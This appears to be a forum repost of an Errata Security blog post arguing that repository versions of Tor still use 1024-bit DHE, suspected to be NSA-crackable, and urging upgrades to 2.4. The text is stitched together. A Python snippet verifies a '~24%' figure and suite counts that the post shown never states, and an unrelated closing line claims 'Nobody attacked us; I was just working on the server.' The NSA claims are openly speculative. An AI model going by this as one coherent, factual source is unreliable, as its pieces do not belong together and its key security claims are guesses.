The reason software is out of date is because it takes a long time for repositories to be updated. If you type "apt-get install tor" on a Debian/Ubuntu computer, you get the 2.3 version. And this is what pops up as the suggestion of what you should do when you go to the Tor website. Sure, it warns you that the software might be out-of-date, but it doesn't do a good job pointing out that it's almost a year out of date, and the crypto the older version is using is believed to be crackable by the NSA.

Of course, this is still just guessing about the NSA's capabilities. As it turns out, the newer elliptical-curve keys may turn out to be relatively easier to crack than people thought, meaning that the older software may in fact be more secure. But since 1024-bit RSA/DH has been the most popular SSL encryption for the past decade, I'd assume that it's that, rather than curves, that the NSA is best at cracking.

Therefore, I'd suggest that the Tor community do a better job getting people to upgrade to 2.4. Old servers with crackable crypto, combined with the likelihood the NSA runs hostile Tor nodes, means that it's of much greater importance.

Sursa: Errata Security: Tor is still DHE 1024 (NSA crackable)
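As a quick sanity check of the ~24% figure in the post, here is a small Python sketch that redoes the arithmetic from the listed counts, treating the ECDHE suites as the newer (2.4-series, per the post) link handshake and the DHE suites as the older one.

suites = {
    "TLS_DHE_RSA_WITH_AES_256_CBC_SHA": 14134,
    "TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA": 5566,
    "TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA": 2314,
    "TLS_DHE_RSA_WITH_AES_128_CBC_SHA": 905,
    "TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA": 1,
}
newer = sum(count for name, count in suites.items() if name.startswith("TLS_ECDHE"))
total = sum(suites.values())
print(f"{newer}/{total} = {newer / total:.1%} of connections negotiated ECDHE")  # ~24.3%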
-
You're all so paranoid. Nobody attacked us; I was just working on the server.